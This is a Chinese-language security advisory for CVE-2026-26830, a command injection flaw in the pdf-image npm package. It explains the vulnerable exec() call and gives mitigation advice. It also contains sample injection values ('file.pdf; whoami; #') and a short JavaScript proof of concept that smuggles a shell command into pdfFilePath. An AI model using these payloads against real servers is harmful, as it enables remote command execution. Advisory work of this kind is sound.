CVE-2026-26830 CVSS 9.8 严重

CVE-2026-26830 pdf-image操作系统命令注入漏洞

披露日期: 2026-03-25

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-26830

漏洞类型

操作系统命令注入

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

pdf-image (npm package)

漏洞概述

pdf-image npm包至2.0.0版本存在严重的操作系统命令注入漏洞。由于该库在处理文件路径时未进行充分过滤，直接将其拼接到shell命令中并执行，攻击者可利用`pdfFilePath`参数注入任意系统命令。该漏洞无需认证且无交互即可远程利用，成功利用可能导致服务器被完全控制，严重威胁系统安全。

技术细节

该漏洞的核心成因在于pdf-image库中的`constructGetInfoCommand`和`constructConvertCommandForPage`函数。这两个函数使用了Node.js的`util.format()`方法构建命令字符串，将用户控制的`pdfFilePath`参数直接插入。随后，该字符串被传递给`child_process.exec()`执行。由于`exec()`会调用系统的Shell（如bash或sh）来解析命令，攻击者可以在文件路径中注入Shell元字符（如分号`;`、反引号`` ` ``或管道符`|`）。这使得攻击者能够终止原有命令并附加执行任意操作系统命令。鉴于CVSS评分高达9.8，且无需认证（PR:N）和用户交互（UI:N），该漏洞极易被自动化工具利用，导致攻击者获取目标服务器的最高权限。

攻击链分析

STEP 1

侦察

攻击者识别目标系统中使用了存在漏洞的pdf-image npm包（版本<=2.0.0）。

STEP 2

武器化

攻击者构造包含Shell元字符的恶意文件路径字符串，例如`file.pdf; whoami; #`，用于绕过原有命令逻辑并执行新命令。

STEP 3

交付

攻击者通过应用程序接口（API）或表单，将恶意的`pdfFilePath`参数发送给运行该库的服务器。

STEP 4

利用

服务器端代码调用`child_process.exec()`执行拼接后的命令，Shell解析器执行注入的恶意代码。

STEP 5

影响

恶意代码在服务器上以运行Node.js进程的用户权限执行，攻击者可读取、修改或删除数据，甚至植入后门。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// PoC for CVE-2026-26830: pdf-image OS Command Injection
const pdfImage = require('pdf-image');

// Malicious payload containing shell metacharacters
// Example: Creating a file named 'pwned' in /tmp/
const maliciousFilePath = "test.pdf; touch /tmp/pwned; #";

try {
    // Initialize pdfImage with the malicious path
    const image = new pdfImage(maliciousFilePath);
    
    // The convertFile function triggers the vulnerable command execution
    image.convertFile().then(function (imagePaths) {
        console.log('Exploit successful. Check /tmp/pwned');
    }).catch(function (err) {
        console.log('Error:', err);
    });
} catch (e) {
    console.log(e);
}

影响范围

pdf-image <= 2.0.0

防御指南

临时缓解措施

在未获得官方补丁前，应立即停止使用受影响版本的pdf-image库。若必须使用，建议在调用库函数之前，对`pdfFilePath`参数实施严格的输入验证，使用正则表达式确保路径仅包含字母、数字、点、斜杠和下划线。同时，审查代码逻辑，确保没有直接将用户输入传递给系统命令执行函数。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-26830
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-26830
3 Details https://www.cvedetails.com/cve/CVE-2026-26830/
4 VulDB https://vuldb.com/cve/CVE-2026-26830
5 Link https://github.com/mooz/node-pdf-image
6 Link https://github.com/zebbernCVE/CVE-2026-26830
7 Link https://www.npmjs.com/package/pdf-image

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表